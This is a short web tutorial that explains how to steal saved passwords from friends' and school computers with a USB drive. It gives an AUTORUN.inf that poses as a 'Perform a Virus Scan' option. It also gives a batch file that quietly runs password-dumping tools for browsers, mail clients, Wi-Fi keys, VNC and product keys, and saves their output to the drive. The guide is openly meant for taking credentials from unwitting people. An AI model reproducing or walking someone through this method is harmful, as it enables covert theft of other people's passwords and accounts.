Hack Your Friends And Collage/School Computer With USB/Through USB! usb thief tutorial/Method 1

By: Hamzakhaliq


Thief Tutorial/Method 1
how to steal passwords with a USB just Seconds

Guys in this Tutorial i will tell you how to steal/Hack someone computer passwords though USB Flash Drive.

Step1: Creat New/ Notepad/Worldpad type or copy/past Text Below,

Action= Perform a Virus Scan

save this as AUTORUN.inf

Step2: Open a new notepad/worldpad document type or copy/past Text Blow.

start mspass.exe/stext mspass.txt

start milpv.exe/stext mailpv.txt

start iepv.exe/stext iepv.txt

start pspv.exe/stext pspv.txt

start PasswoerdFox.exe/stext passwordfox.txt

start Operapassview.exe/stext OperaPassView.txt

start ChromePass.exe/stext Chromepass.txt

start Dialupass.exe/stext Dialupass.txt

Start netpass.exe/stext netpass.txt

start wirelessKeyVeiw.exe/stext WirelessKeyView.txt

start BulletsPassView.exe/stext BulletsPassView.txt

start VNCPassView.exe/stext VNCPassView.txt

start OpenedfilesView.exe/stext OpenedFilesView.txt

start ProduKey.exe/stext ProduKey.txt

start USBDeview.exe/stext USBDeview.txt

save this as LUNCH.bat

now you have 2 files

Step3: copy the autorun and lunch file to your USB
Step4: Go to http://adf.ly/5f3Lq and download the programs which named in step2
Step5: extract the files you downloaded to your desktop and copy all the .exe files to your USB
Step6: remove and re-insert your USB
Step7: click on the option''perform a virus scan'' (this is an example,if you want it to say something eals go to the autorun file and change it:-))
Step8: now go to my computer and see USB Drive,you will now see some text files,if you open then you will see usernames and passwords :-))

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